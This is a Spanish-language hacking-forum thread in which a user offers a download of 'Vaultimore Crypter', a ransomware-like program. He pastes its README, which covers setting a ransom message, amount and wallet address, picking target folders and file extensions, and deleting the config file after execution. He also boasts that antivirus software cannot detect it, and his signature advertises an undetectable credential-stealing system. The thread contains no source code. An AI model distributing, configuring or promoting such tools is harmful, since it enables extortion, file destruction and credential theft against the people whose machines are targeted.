Vaultimore Crypter 1.1 # Especie de "Ransomware"

  • 2 Respuestas
  • 6312 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado JoxM

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
  • Nada siempre es algo
    • Ver Perfil
    • Email

Vaultimore Crypter 1.1 # Especie de "Ransomware"

  • en: Junio 20, 2018, 11:49:00 am
Buenas amigos.

Voy a dejar por aquí un pequeño sistema que trabaja como un ransomware "algo más liviano". Digo esto por que no va a infectarse toda una red, ni enviar por email ni nada de eso. Explico.

Es un programita que cuando se ejecuta, encripta los archivos que haya encontrado en el directorio indicado previamente. La búsqueda es recursiva y puedes buscar por varias extensiones a la vez.

El programa no tiene interfaz, sólo se ve por unos segundos un pequeño cuadro negro en la parte inferior derecha del monitor. Cuando termina se cierra el proceso.

Dejo algunas capturas y voy a pegar aquí el README en inglés que he creado para indicar un poco su uso.





Código: You are not allowed to view links. Register or Login
Vaultimore.exe -> Crypter. CAUTION! Only need execute to run!

VaultimoreDEC.exe -> Decrypter. CAUTION Need params.ini with same config to encryption for decrypt.


## CONFIGURATION ##
.......................
It is only necessary to configure the parameters that are at the beginning of this file. Change the values after the = sign.
......................
msg1 -> Message explaining what happened. You can write whatever you want.
......................
ammount -> Rescue money. Includes the currency code.
......................
walletaddress -> It is where you can establish the address where they will make the payment.
......................
pathtosearch -> Directory where it will search the files to be encrypted. The search includes all subdirectories. You can set parameters like these:

C:/Users/::username::/...

In this case, the username variable will refer to the user name of the machine. These variables are always established between :: and ::.

The available ones are:

::username:: The name of the Windows User
::documents:: Documents directory (example usage: ::documents::/anyfolder/) Is equal to C:\Users\JOSE\Documents\anyfolder
::programfiles:: Program files directory (example usage: ::programfiles::/Adobe/) Is equal to c:\program files\adobe\
.......................
extensionstoencrypt -> Sets the extensions of the file types to be encrypted. (Example: *.txt;*.mdb;*.csv)
.......................
cryptextension -> Extension for crypt files with any word extension. (Example: .criptin)
.......................
cryptpass - > Master password to encryption. IMPORTANT!!! This same password is necessary to decrypt the files again.
.......................
deleteparams ->  1 = Delete params.ini after execution. 0 = NO delete params.ini after execution. CAUTION Need params.ini with same config to encryption for decrypt.

Como véis es bastante configurable. Por defecto y como máximo puede buscar archivos extensiones de hasta 4 caracteres de largo para su posterior encriptación. Si por ejemplo la variable pathtosearch la configuras como:

pathtosearch=C:/

Va a demorarse más en sacar todos los archivos con las extensiones indicadas que si la estableces en esto:

pathtosearch=::documents::

Qué sólo buscará en la carpeta de Mis Documentos.

No lo detecta ningún antivirus, en Virustotal hay 2 falsos positivos por que no tiene nada que ver lo que "detecta" con lo que "debería detectar"

You are not allowed to view links. Register or Login

Me gustaría tener opiniones de qué tal el funcionamiento. Por el momento no voy a compartir el código ya que el sistema que uso para programar es anticuado pero nadie le saca tanto partido como yo :).

Dejaré el enlace activo sólo unos días.

NUEVO LINK ACTUALIZADO ZIPPYSHARE
You are not allowed to view links. Register or Login

ZIP PASS: 1122A

Un saludo a [email protected]!
« Última modificación: Agosto 28, 2018, 08:12:41 am por JoxM »
Sistema indetectable para obtener credenciales. Contacta conmigo y te hago una demo.

Desconectado byte01

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Vaultimore Crypter 1.1 # Especie de "Ransomware"

  • en: Agosto 04, 2018, 10:14:46 am
link death dude, reupload please

Desconectado JoxM

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
  • Nada siempre es algo
    • Ver Perfil
    • Email

Re:Vaultimore Crypter 1.1 # Especie de "Ransomware"

  • en: Agosto 28, 2018, 08:13:09 am
Link updated!
Sistema indetectable para obtener credenciales. Contacta conmigo y te hago una demo.